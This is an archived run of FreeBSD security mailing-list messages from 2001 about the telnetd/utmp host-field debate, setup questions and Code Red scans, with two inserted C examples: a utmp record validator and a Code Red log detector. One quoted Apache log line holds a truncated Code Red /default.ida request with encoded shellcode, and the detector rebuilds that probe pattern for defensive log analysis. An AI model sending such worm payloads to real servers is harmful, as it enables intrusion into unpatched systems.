Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id DBD4337B403; Mon, 23 Jul 2001 08:38:42 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.11.4/8.11.4) id f6NFcZl81468; Mon, 23 Jul 2001 11:38:35 -0400 (EDT) (envelope-from wollman)
Date: Mon, 23 Jul 2001 11:38:35 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu>
To: Matt Dillon
Cc:
Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip
In-Reply-To: <200107230354.f6N3stj13517@earth.backplane.com>
References:
<000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com>

< said:

> All very nice, guys, but not realistic. Only FreeBSD uses an API.

Erm, no, wrong.

SVR4 has an API. This API is standardized as a part of the Austin Group process.

-GAWollman

From owner-freebsd-security Mon Jul 23 8:57:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id B7DE937B405; Mon, 23 Jul 2001 08:57:28 -0700 (PDT) (envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6NFvQb17025; Mon, 23 Jul 2001 08:57:26 -0700 (PDT) (envelope-from dillon)
Date: Mon, 23 Jul 2001 08:57:26 -0700 (PDT)
From: Matt Dillon
Message-Id: <200107231557.f6NFvQb17025@earth.backplane.com>
To: Garrett Wollman
Cc:
Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip
References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu>

:
:< said:
:
:> All very nice, guys, but not realistic. Only FreeBSD uses an API.
:
:Erm, no, wrong.
:
:SVR4 has an API. This API is standardized as a part of the Austin
:Group process.
:
:-GAWollman

    Fine.. then if you want to get all the third party program authors to
    use a magic API, be my guest. Could it be, no... it couldn't...
    all those programs couldn't just not *know* about the 'Austin Group
    process' could they? That's criminal! Oops, oh well so much for
    that!

    Even ssh, about the closest third party program to BSD as there ever
    was, doesn't use an API call for lastlog. It does for utmp, sort-of,
    but not for lastlog. Bzzzt.

-Matt

From owner-freebsd-security Mon Jul 23 8:58:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id E323837B403; Mon, 23 Jul 2001 08:58:39 -0700 (PDT) (envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6NFwTB17064; Mon, 23 Jul 2001 08:58:29 -0700 (PDT) (envelope-from dillon)
Date: Mon, 23 Jul 2001 08:58:29 -0700 (PDT)
From: Matt Dillon
Message-Id: <200107231558.f6NFwTB17064@earth.backplane.com>
To: Brian Somers
Cc: Jeroen Massar, Brian Somers, Hajimu UMEMOTO, aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
References: <200107231117.f6NBHYg61233@hak.lan.Awfulhak.org>

:
:Matt wrote:
:> > Pretty much our only option is to extend the size of existing fields
:> > and take the 'oh hell the structure size changed' hit.
:
:I wrote:
:> Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only
:> put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0).
:>
:> Any disagreements ? Should this be brought up (explained) on -arch
:> now ?
:
:Interestingly enough, OpenBSD has UT_HOSTSIZE set to 256.
:
:--
:Brian

    Heh.
    Are they still trying to store the FQDN?

-Matt

From owner-freebsd-security Mon Jul 23 8:59:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id B2B1037B403; Mon, 23 Jul 2001 08:59:52 -0700 (PDT) (envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6NFxng17095; Mon, 23 Jul 2001 08:59:49 -0700 (PDT) (envelope-from dillon)
Date: Mon, 23 Jul 2001 08:59:49 -0700 (PDT)
From: Matt Dillon
Message-Id: <200107231559.f6NFxng17095@earth.backplane.com>
To: Brian Somers
Cc: "Jeroen Massar", "'Brian Somers'", "'Hajimu UMEMOTO'", aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG, brian@Awfulhak.org
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
References: <200107231012.f6NACgg60192@hak.lan.Awfulhak.org>

:
:Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only
:put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0).
:
:Any disagreements ? Should this be brought up (explained) on -arch
:now ?

    Make it 56, and you've got to put the whole IP address in the field,
    not the short form. Logs are often processed off-host and the short
    form wouldn't be useful. And we have to worry about X at some point.
    40 isn't quite big enough.

-Matt

:
:--
:Brian
: http://www.freebsd-services.com/
:Don't _EVER_ lose your sense of humour !
From owner-freebsd-security Mon Jul 23 9: 1: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web13308.mail.yahoo.com (web13308.mail.yahoo.com [216.136.175.44]) by hub.freebsd.org (Postfix) with SMTP id 44AE137B403 for ; Mon, 23 Jul 2001 09:00:58 -0700 (PDT) (envelope-from ewancarr@yahoo.com)
Message-ID: <20010723160056.98649.qmail@web13308.mail.yahoo.com>
Received: from [158.234.10.144] by web13308.mail.yahoo.com via HTTP; Mon, 23 Jul 2001 17:00:56 BST
Date: Mon, 23 Jul 2001 17:00:56 +0100 (BST)
From: Ewan Carr
Subject: libcrypto.o.2
To: FreeBSD-Security@FreeBSD.Org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Hi,

Any pointers on the problem below would be appreciated - ta !

Installed FreeBSD 4.2 successfully from CD
Installed racoon (racoon-20010418a.tgz) from web successfully.

When running racoon I get the following problem
/usr/libexec/ld-elf.so.1 Shared object "libcrypto.so.2" not found ?

Do I need an earlier version of racoon ?

ps. could you cc ewancarr@yahoo.com - i do not subscribe to the list - thanks again
From owner-freebsd-security Mon Jul 23 9:13:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cpimssmtpu06.email.msn.com (cpimssmtpu06.email.msn.com [207.46.181.82]) by hub.freebsd.org (Postfix) with ESMTP id DD24C37B405; Mon, 23 Jul 2001 09:13:46 -0700 (PDT) (envelope-from JHowie@msn.com)
Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu06.email.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Mon, 23 Jul 2001 09:13:28 -0700
Message-ID: <00e001c11393$37995340$0101a8c0@development.local>
From: "John Howie"
To: "Matt Dillon", "Garrett Wollman"
Cc:
References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> <200107231557.f6NFvQb17025@earth.backplane.com>
Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Mon, 23 Jul 2001 09:19:14 -0700
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
X-OriginalArrivalTime: 23 Jul 2001 16:13:28.0628 (UTC) FILETIME=[68BA5740:01C11392]

This is getting off-topic for security but how about taking utmp and implementing it as a device? I haven't sat down and thought it all through but you could reasonably easily check the format of the data written to it (or at least check the size) to determine how to handle it, and likewise for the reads. That way you don't have to break your back trying to port all those third party apps. A daemon could pick up the processed data and write it to a log.
Even better, have the information validated in the kernel before being logged. From a security perspective I have never liked the fact that crucial log files can just be written to by any old app that happens to run in root context.

john...

----- Original Message -----
From: "Matt Dillon"
To: "Garrett Wollman"
Cc: ;
Sent: Monday, July 23, 2001 8:57 AM
Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip

>
> :
> :< said:
> :
> :> All very nice, guys, but not realistic. Only FreeBSD uses an API.
> :
> :Erm, no, wrong.
> :
> :SVR4 has an API. This API is standardized as a part of the Austin
> :Group process.
> :
> :-GAWollman
>
> Fine.. then if you want to get all the third party program authors to
> use a magic API, be my guest. Could it be, no... it couldn't...
> all those programs couldn't just not *know* about the 'Austin Group
> process' could they? That's criminal! Oops, oh well so much for
> that!
>
> Even ssh, about the closest third party program to BSD as there ever
> was, doesn't use an API call for lastlog. It does for utmp, sort-of,
> but not for lastlog. Bzzzt.
>
> -Matt

From owner-freebsd-security Mon Jul 23 9:33:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peace.mahoroba.org (peace.calm.imasy.or.jp [202.227.26.34]) by hub.freebsd.org (Postfix) with ESMTP id 73CEE37B40A; Mon, 23 Jul 2001 09:33:45 -0700 (PDT) (envelope-from ume@mahoroba.org)
Received: from localhost (IDENT:1UujV5C/BrMGvbfWSlacUInHQ9jzznsNN7HadixyDUosgiHIfpXNV03GBtSezIqs@localhost [::1]) (authenticated as ume with CRAM-MD5) by peace.mahoroba.org (8.11.4/8.11.4/peace) with ESMTP/inet6 id f6NGVkY93428; Tue, 24 Jul 2001 01:31:46 +0900 (JST) (envelope-from ume@mahoroba.org)
Date: Tue, 24 Jul 2001 01:31:41 +0900 (JST)
Message-Id: <20010724.013141.74694496.ume@mahoroba.org>
To: dillon@earth.backplane.com
Cc: brian@Awfulhak.org, jeroen@unfix.org, brian@freebsd-services.com, aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
From: Hajimu UMEMOTO
In-Reply-To: <200107231558.f6NFwTB17064@earth.backplane.com>
References: <200107231117.f6NBHYg61233@hak.lan.Awfulhak.org> <200107231558.f6NFwTB17064@earth.backplane.com>
X-Mailer: xcite1.38> Mew version 1.95b119 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?=
X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc
X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC
X-URL: http://www.imasy.org/~ume/
X-Operating-System: FreeBSD 5.0-CURRENT
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

>>>>> On Mon, 23 Jul 2001 08:58:29 -0700 (PDT)
>>>>> Matt Dillon said:

dillon> :Interestingly enough, OpenBSD has UT_HOSTSIZE set to 256.

I think they are preparing for a new protocol in the future.

--
Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan
ume@mahoroba.org  ume@bisd.hitachi.co.jp  ume@{,jp.}FreeBSD.org
http://www.imasy.org/~ume/

From owner-freebsd-security Mon Jul 23 9:50:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id F072A37B407; Mon, 23 Jul 2001 09:50:07 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.11.4/8.11.4) id f6NGnq982448; Mon, 23 Jul 2001 12:49:52 -0400 (EDT) (envelope-from wollman)
Date: Mon, 23 Jul 2001 12:49:52 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200107231649.f6NGnq982448@khavrinen.lcs.mit.edu>
To: Matt Dillon
Cc:
Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip
In-Reply-To: <200107231557.f6NFvQb17025@earth.backplane.com>
References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> <200107231557.f6NFvQb17025@earth.backplane.com>

< said:

> Fine.. then if you want to get all the third party program authors to
> use a magic API, be my guest.

If they run on Solaris -- which most of them do -- then they already do. Nice try, Matt, but far off the mark.
-GAWollman

From owner-freebsd-security Mon Jul 23 9:51:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp03.mrf.mail.rcn.net (smtp03.mrf.mail.rcn.net [207.172.4.62]) by hub.freebsd.org (Postfix) with ESMTP id EC8AB37B40A for ; Mon, 23 Jul 2001 09:51:21 -0700 (PDT) (envelope-from jolt-mail@nicholasofmyra.org)
Received: from 207-172-109-89.s89.tnt1.war.va.dialup.rcn.com ([207.172.109.89] helo=compops1.nicholasofmyra.org) by smtp03.mrf.mail.rcn.net with esmtp (Exim 3.31 #3) id 15OivO-0004MO-00 for freebsd-security@freebsd.org; Mon, 23 Jul 2001 12:51:19 -0400
Message-Id: <5.1.0.14.0.20010723123615.00aebd90@10.100.0.5>
X-Sender: jolt@joseph.nicholasofmyra.org (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Mon, 23 Jul 2001 12:53:33 -0400
To: freebsd-security@freebsd.org
From: Joseph
Subject: Make world - crypt-blowfish.c error
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed

I'm not sure what, if anything, I'm doing wrong. I've installed FreeBSD 4.3 with the src tree. I could do a make world fine after the initial installation. I cvsup'ed, and now I keep getting this error.

make world

or

cd /usr/src/lib/libcrypt/
make

results in:

make: don't know how to make crypt-blowfish.c. Stop

Any suggestions?
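Two earlier messages in this thread make concrete, checkable claims about the utmp record: Matt Dillon's point that third-party programs often skip the bzero before writing the structure, and that a 40-byte UT_HOSTSIZE is "not quite big enough" once the full-form address has to share the field with an X display; and John Howie's suggestion that whatever accepts the record (a device or daemon) should check its size and format before logging it. The following is an added C example written for this page; it is not code from the thread, from FreeBSD's utmp.h or from any of the programs mentioned. The struct layout, the field sizes, the line and user names, and the address fec0:0000:0000:0000:0000:0000:0000:0001 are assumptions made for illustration.

```c
/* Added example, not code from the thread or from FreeBSD's <utmp.h>:
 * a toy utmp-style record with fixed-size fields.  Field sizes, layout
 * and the address below are assumptions for illustration only. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define UT_LINESIZE 8
#define UT_NAMESIZE 16
#define UT_HOSTSIZE 40          /* the size proposed in the thread */

struct utmp_rec {
    char ut_line[UT_LINESIZE];
    char ut_name[UT_NAMESIZE];
    char ut_host[UT_HOSTSIZE];
    long ut_time;
};

/* Longest full-form IPv6 address: 8 groups of 4 hex digits plus 7
 * colons = 39 characters.  It fits in 40 bytes only with nothing
 * appended (constructed placeholder address). */
#define FULL_V6 "fec0:0000:0000:0000:0000:0000:0000:0001"

/* Write src into a fixed-size field, zero-filling the remainder.
 * Returns 1 if the whole string fit with a terminating NUL, else 0. */
static int fill_field(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    memset(dst, 0, dstsz);
    if (n >= dstsz) {
        memcpy(dst, src, dstsz - 1);    /* keep one byte for the NUL */
        return 0;
    }
    memcpy(dst, src, n);
    return 1;
}

/* Fill a record from the peer's address plus an optional X display
 * suffix such as ":0.0".  The whole struct is zeroed first, the step
 * Dillon says third-party programs skip; without it, padding and unused
 * bytes carry stack contents into the log file.  Returns 1 if the host
 * field held the complete string. */
int utmp_fill(struct utmp_rec *r, const char *line, const char *name,
              const char *addr, const char *display)
{
    char host[128];
    memset(r, 0, sizeof *r);
    snprintf(host, sizeof host, "%s%s", addr, display ? display : "");
    fill_field(r->ut_line, sizeof r->ut_line, line);
    fill_field(r->ut_name, sizeof r->ut_name, name);
    return fill_field(r->ut_host, sizeof r->ut_host, host);
}

/* A field is acceptable if a NUL appears inside it and every byte
 * before the NUL is printable, so terminal control sequences cannot
 * reach whoever later runs who(1) or last(1) over the file. */
static int field_ok(const char *f, size_t sz)
{
    size_t i;
    for (i = 0; i < sz; i++) {
        if (f[i] == '\0')
            return 1;
        if (!isprint((unsigned char)f[i]))
            return 0;
    }
    return 0;                           /* unterminated: reject */
}

/* What a logging device or daemon could check before appending a
 * record handed to it by an arbitrary root-context program. */
int utmp_validate(const void *buf, size_t len)
{
    const struct utmp_rec *r = buf;
    if (len != sizeof(struct utmp_rec))
        return 0;
    return field_ok(r->ut_line, sizeof r->ut_line)
        && field_ok(r->ut_name, sizeof r->ut_name)
        && field_ok(r->ut_host, sizeof r->ut_host);
}

/* Scenario helpers with checkable return values. */
int host_fits(const char *addr, const char *display)
{
    struct utmp_rec r;
    return utmp_fill(&r, "ttyp0", "jeroen", addr, display);
}

int clean_record_accepted(void)
{
    struct utmp_rec r;
    utmp_fill(&r, "ttyp0", "jeroen", FULL_V6, NULL);
    return utmp_validate(&r, sizeof r);
}

/* A host field smuggling an escape sequence, and a record of the wrong
 * length, must both be rejected. */
int bad_records_rejected(void)
{
    struct utmp_rec r;
    utmp_fill(&r, "ttyp0", "jeroen", FULL_V6, NULL);
    memcpy(r.ut_host, "\x1b[2Jhost", 8);
    return utmp_validate(&r, sizeof r) == 0
        && utmp_validate(&r, sizeof r - 1) == 0;
}
```

With UT_HOSTSIZE at 40, `host_fits(FULL_V6, NULL)` succeeds but `host_fits(FULL_V6, ":0.0")` reports truncation, which is the case Dillon's "make it 56" is meant to cover; the same code with the define raised to 56 accepts both. The validation half keeps a record of the wrong size, or one carrying non-printable bytes, out of the file regardless of which program wrote it.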
From owner-freebsd-security Mon Jul 23 10: 7: 5 2001
Delivered-To: freebsd-security@freebsd.org
Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id 41CB637B40D for ; Mon, 23 Jul 2001 10:06:51 -0700 (PDT) (envelope-from carock@epconline.net)
Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6NH6oX66448 for ; Mon, 23 Jul 2001 12:06:50 -0500 (CDT)
From: "Chuck Rock"
To:
Subject: RE: telnetd root exploit
Date: Mon, 23 Jul 2001 12:06:50 -0500
Message-ID: <004d01c11399$dd3d9850$1805010a@epconline.net>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
X-Mimeole: Produced By Microsoft MimeOLE V5.50.4522.1200
In-Reply-To: <20010722120932.E56521@osaka.louisville.edu>
Importance: Normal

Until an official advisory is released, does that mean there's no official patch yet? I'm new to patches, and was looking for them on the FTP site, but they are all listed by the advisory number...

Chuck

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Keith Stevenson
> Sent: Sunday, July 22, 2001 11:10 AM
> To: Kris Kennaway
> Cc: security@FreeBSD.ORG
> Subject: Re: telnetd root exploit
>
>
> On Sat, Jul 21, 2001 at 02:53:55PM -0700, Kris Kennaway wrote:
> > On Sat, Jul 21, 2001 at 02:50:05PM -0700, Holtor wrote:
> > > Any idea when the official advisory will be sent?
> > > I don't want to think i'm patched and restart telnetd
> > > only to be rooted by some lame script kiddie. Thanks
> > > much.
> >
> > Probably Monday.
>
> I have a small suggestion for this and future advisories. Could
> you include
> which file versions are "fixed"? For example, in addition to stating that
> the problem was resolved on a certain date, also include that the
> fix is in
> foo.c version (mumble). It would help make certain that I am
> indeed patched.
> (Yes, I do read the commit messages, but I've been known to miss these
> things.)
>
> Regards,
> --Keith Stevenson--
>
> --
> Keith Stevenson
> System Programmer - Data Center Services - University of Louisville
> keith.stevenson@louisville.edu
> GPG key fingerprint = 332D 97F0 6321 F00F 8EE7 2D44 00D8 F384 75BB 89AE

From owner-freebsd-security Mon Jul 23 10: 8:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id D860037B406; Mon, 23 Jul 2001 10:08:01 -0700 (PDT) (envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6NH7wU18016; Mon, 23 Jul 2001 10:07:58 -0700 (PDT) (envelope-from dillon)
Date: Mon, 23 Jul 2001 10:07:58 -0700 (PDT)
From: Matt Dillon
Message-Id: <200107231707.f6NH7wU18016@earth.backplane.com>
To: Garrett Wollman
Cc:
Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip
References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> <200107231557.f6NFvQb17025@earth.backplane.com> <200107231649.f6NGnq982448@khavrinen.lcs.mit.edu>

:
:< said:
:
:> Fine.. then if you want to get all the third party program authors to
:> use a magic API, be my guest.
:
:If they run on Solaris -- which most of them do -- then they already
:do. Nice try, Matt, but far off the mark.
:
:-GAWollman

    Really.. Let's see. wu-ftpd... nope. proftpd... nope. Want me to
    continue?

-Matt

From owner-freebsd-security Mon Jul 23 10: 8:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from d170h113.resnet.uconn.edu (d170h113.resnet.uconn.edu [137.99.170.113]) by hub.freebsd.org (Postfix) with SMTP id 50D7E37B408 for ; Mon, 23 Jul 2001 10:08:22 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net)
Received: (qmail 12349 invoked by uid 1001); 23 Jul 2001 17:15:29 -0000
Message-ID: <20010723171529.12348.qmail@d170h113.resnet.uconn.edu>
References: <20010721204942.12010.qmail@salvation.unixgeeks.com> <20010721145417.A86996@networkcommand.com>
In-Reply-To: <20010721145417.A86996@networkcommand.com>
From: "Peter C. Lai"
To: "jono@networkcommand.com"
Cc: nathan@salvation.unixgeeks.com, freebsd-security@FreeBSD.ORG
Subject: Re: Reinfection phase Re: possible?
Date: Mon, 23 Jul 2001 17:15:28 GMT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

My apache logs also show a crapload of "Malformed Headers" from the same IP blocks, which I suspect is from Code Red attempts.

Jon O . writes:

>
> I just wanted to make sure everyone was aware that Code Red is supposed
> to restart its infection phase on 8.01.01.
>
> www.eeye.com has a good write up on this and the rest of the worm.
>
> Watch out for their scanner tool though, it's a windows binary and there
> is no source...
>
> On 21-Jul-2001, nathan@salvation.unixgeeks.com wrote:
>>
>> okay, today i checked my apache logs this is what i got:
>>
>> 195.10.116.2 - - [19/Jul/2001:15:50:20 -0700] "GET /default.ida?NNNNNNNNNNNNNNNN
>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u
>> 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53
>> 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 332
>>
>> this same exact get request came from several different address as well. such
>> as: 128.138.105.172, 202.157.154.126, and a couple of others. any ideas? any
>> remote exploits in apache i've missed? i'm running Apache/1.3.19 Server..
>>
>> thanks in advance,
>> nathan.

-----------
Peter C. Lai
University of Connecticut
Dept. of Residential Life | Programmer
Dept. of Molecular and Cell Biology | Undergraduate Research Assistant/Honors Program
http://cowbert.2y.net/

From owner-freebsd-security Mon Jul 23 11:46:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from vl7.net (OL51-141.fibertel.com.ar [24.232.141.51]) by hub.freebsd.org (Postfix) with ESMTP id D3B4A37B403 for ; Mon, 23 Jul 2001 11:46:29 -0700 (PDT) (envelope-from fox@vl7.net)
Received: from localhost (fox@localhost) by vl7.net (8.11.3/8.11.3) with ESMTP id f6NIox535697 for ; Mon, 23 Jul 2001 15:51:06 -0300 (ART) (envelope-from fox@vl7.net)
Date: Mon, 23 Jul 2001 15:50:59 -0300 (ART)
From: Vladimir
To:
Subject: login.conf
Message-ID: <20010723154028.B35681-100000@vl7.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hi, All!

I tried to configure my login.conf, so I have one question about the parameter "sbsize": what is this parameter limiting, what is the recommended size of the socket buffer, and what depends on this buffer? I checked the man pages but found nothing about this :(

Thank you.

Best regards,
Vladimir.
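Returning to the Code Red thread a few messages up: Nathan's Apache log shows the worm's probe (a GET for /default.ida padded with a long run of N characters and followed by a %u-encoded payload, answered with a 400 because Apache has no .ida handler), and Peter Lai sees the same source blocks producing "Malformed Headers". The following added C example, not code from the list or from eEye, scans access-log lines for that probe and reports how many there were and where the first came from. It goes one step beyond the page in also accepting an X padding run, which is what the later Code Red II variant sends. The sample log lines, the 192.0.2.x and 198.51.100.x addresses and the shortened %u payload are all constructed for the example.

```c
/* Added example, not code from the thread: a small detector for the
 * Code Red probe seen in Nathan's Apache log excerpt.  The sample log
 * lines below are constructed and use documentation addresses. */
#include <stdio.h>
#include <string.h>

#define PAD_MIN 100   /* the real probe carries over 200 padding bytes */

/* 1 if an access-log line looks like a Code Red probe.  On Apache the
 * request fails harmlessly (the 400 in the log), but the client
 * address identifies an infected host scanning your range. */
int is_code_red_probe(const char *line)
{
    const char *p = strstr(line, "GET /default.ida?");
    size_t run;
    if (p == NULL)
        return 0;
    p += strlen("GET /default.ida?");
    run = strspn(p, "N");          /* the original worm pads with 'N' */
    if (run == 0)
        run = strspn(p, "X");      /* the Code Red II variant pads with 'X' */
    return run >= PAD_MIN && strstr(p + run, "%u") != NULL;
}

/* Count probe lines in a newline-separated buffer.  The client address
 * (first field of the common log format) of the first probe is copied
 * into first_src when that pointer is non-NULL. */
int count_probes(const char *log, char *first_src, size_t srcsz)
{
    int n = 0;
    const char *line = log;
    while (*line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[2048];
        if (len >= sizeof buf)
            len = sizeof buf - 1;  /* a real probe line is about 400 bytes */
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (is_code_red_probe(buf)) {
            if (n == 0 && first_src != NULL && srcsz > 0) {
                size_t a = strcspn(buf, " ");
                if (a >= srcsz)
                    a = srcsz - 1;
                memcpy(first_src, buf, a);
                first_src[a] = '\0';
            }
            n++;
        }
        if (nl == NULL)
            break;
        line = nl + 1;
    }
    return n;
}

/* Constructed probe line in the shape of the one posted to the list:
 * 224 bytes of padding, then the start of the %u-encoded payload. */
static void make_probe_line(char *out, size_t sz, const char *src, char pad)
{
    char padding[225];
    memset(padding, pad, 224);
    padding[224] = '\0';
    snprintf(out, sz,
             "%s - - [19/Jul/2001:15:50:20 -0700] \"GET /default.ida?%s"
             "%%u9090%%u6858%%ucbd3%%u7801%%u9090%%u00=a HTTP/1.0\" 400 332",
             src, padding);
}

/* Three-line sample log: an N-padded probe, an ordinary request and an
 * X-padded probe. */
static void build_sample_log(char *log, size_t sz)
{
    char l1[512], l2[512];
    make_probe_line(l1, sizeof l1, "192.0.2.10", 'N');
    make_probe_line(l2, sizeof l2, "198.51.100.7", 'X');
    snprintf(log, sz, "%s\n%s\n%s\n", l1,
             "192.0.2.44 - - [19/Jul/2001:16:02:11 -0700] "
             "\"GET /index.html HTTP/1.0\" 200 1043", l2);
}

int demo_probe_count(void)
{
    char log[2048];
    build_sample_log(log, sizeof log);
    return count_probes(log, NULL, 0);
}

/* 1 if the first probing address in the sample log is the one expected. */
int demo_first_source_is(const char *expect)
{
    char log[2048], src[64];
    src[0] = '\0';
    build_sample_log(log, sizeof log);
    count_probes(log, src, sizeof src);
    return strcmp(src, expect) == 0;
}
```

Run over the constructed sample, `demo_probe_count()` returns 2 and the first source is 192.0.2.10; the ordinary /index.html request is not counted, nor is a short /default.ida request without the padding run. Feeding the function a real access log (one line per call to `count_probes`, or the whole file in a buffer) gives the list of infected hosts that Jon O.'s message warns will start scanning again, which is what a firewall rule or an abuse report needs rather than the log noise itself.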
From owner-freebsd-security Mon Jul 23 11:50:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 9C2E137B409 for ; Mon, 23 Jul 2001 11:50:27 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 57699 invoked by uid 1000); 23 Jul 2001 18:49:34 -0000
Date: Mon, 23 Jul 2001 21:49:34 +0300
From: Peter Pentchev
To: Ewan Carr
Cc: FreeBSD-Security@FreeBSD.Org
Subject: Re: libcrypto.o.2
Message-ID: <20010723214933.A55298@ringworld.oblivion.bg>
Mail-Followup-To: Ewan Carr, FreeBSD-Security@FreeBSD.Org
References: <20010723160056.98649.qmail@web13308.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010723160056.98649.qmail@web13308.mail.yahoo.com>; from ewancarr@yahoo.com on Mon, Jul 23, 2001 at 05:00:56PM +0100

